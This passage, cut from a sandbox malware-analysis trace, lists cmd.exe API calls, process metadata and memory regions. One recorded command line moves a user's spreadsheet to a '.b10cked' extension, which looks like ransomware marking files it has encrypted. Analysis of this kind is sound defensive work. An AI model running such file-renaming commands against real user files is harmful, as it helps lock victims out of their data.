lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] GetFileType (hFile=0x4c) returned 0x1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] GetFileType (hFile=0x4c) returned 0x1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] GetFileType (hFile=0x4c) returned 0x1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.571] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.571] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] GetFileType (hFile=0x4c) returned 0x1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] GetFileType (hFile=0x4c) returned 0x1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] GetFileType (hFile=0x4c) returned 0x1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.576] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.577] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] GetFileType (hFile=0x4c) returned 0x1 [0142.577] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.577] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] GetFileType (hFile=0x4c) returned 0x1 [0142.578] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.578] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] GetFileType (hFile=0x4c) returned 0x1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.579] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x32, lpOverlapped=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] GetFileType (hFile=0x4c) returned 0x1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] GetFileType (hFile=0x4c) returned 0x1 [0142.579] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.579] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x32, lpOverlapped=0x0) returned 1 [0142.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.579] _close (_FileHandle=4) returned 0 [0142.579] FindNextFileW (in: hFindFile=0x360e90, lpFindFileData=0x2cf41c | out: lpFindFileData=0x2cf41c) returned 0 [0142.580] GetLastError () returned 0x12 [0142.580] FindClose (in: hFindFile=0x360e90 | out: hFindFile=0x360e90) returned 1 [0142.580] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.581] _close (_FileHandle=3) returned 0 [0142.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.581] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.581] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.581] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.581] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.582] SetConsoleInputExeNameW () returned 0x1 [0142.582] GetConsoleOutputCP () returned 0x1b5 [0142.582] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.582] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.582] exit (_Code=0) Process: id = "162" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xdbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14731 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14732 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14733 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14734 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 14735 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14736 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14737 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14738 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14739 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14740 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15546 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15547 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15548 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15549 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 15550 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 15551 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15552 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15553 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15554 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15555 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15556 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15557 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15558 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15559 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15560 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 15561 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15562 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15563 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15564 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15565 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15566 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15567 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 15568 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 15569 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 219 os_tid = 0xde0 [0140.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fca4 | out: lpSystemTimeAsFileTime=0x20fca4*(dwLowDateTime=0x8d7d3a00, dwHighDateTime=0x1d440a9)) [0140.186] GetCurrentProcessId () returned 0xdbc [0140.186] GetCurrentThreadId () returned 0xde0 [0140.186] GetTickCount () returned 0x2c080 [0140.186] QueryPerformanceCounter (in: lpPerformanceCount=0x20fc9c | out: lpPerformanceCount=0x20fc9c*=19697542333) returned 1 [0140.187] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.187] __set_app_type (_Type=0x1) [0140.187] __p__fmode () returned 0x76b331f4 [0140.187] __p__commode () returned 0x76b331fc [0140.187] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.187] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.187] GetCurrentThreadId () returned 0xde0 [0140.188] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde0) returned 0x38 [0140.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.188] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.188] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.188] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.188] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fc34 | out: phkResult=0x20fc34*=0x0) returned 0x2 [0140.188] VirtualQuery (in: lpAddress=0x20fc6b, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.188] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fc04, dwLength=0x1c | out: lpBuffer=0x20fc04*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.188] GetConsoleOutputCP () returned 0x1b5 [0140.188] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.188] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.189] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.189] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.189] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.189] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.189] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.189] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.189] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.190] GetEnvironmentStringsW () returned 0x3c01a0* [0140.190] FreeEnvironmentStringsW (penv=0x3c01a0) returned 1 [0140.190] GetEnvironmentStringsW () returned 0x3c01a0* [0140.190] FreeEnvironmentStringsW (penv=0x3c01a0) returned 1 [0140.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eba4 | out: phkResult=0x20eba4*=0x40) returned 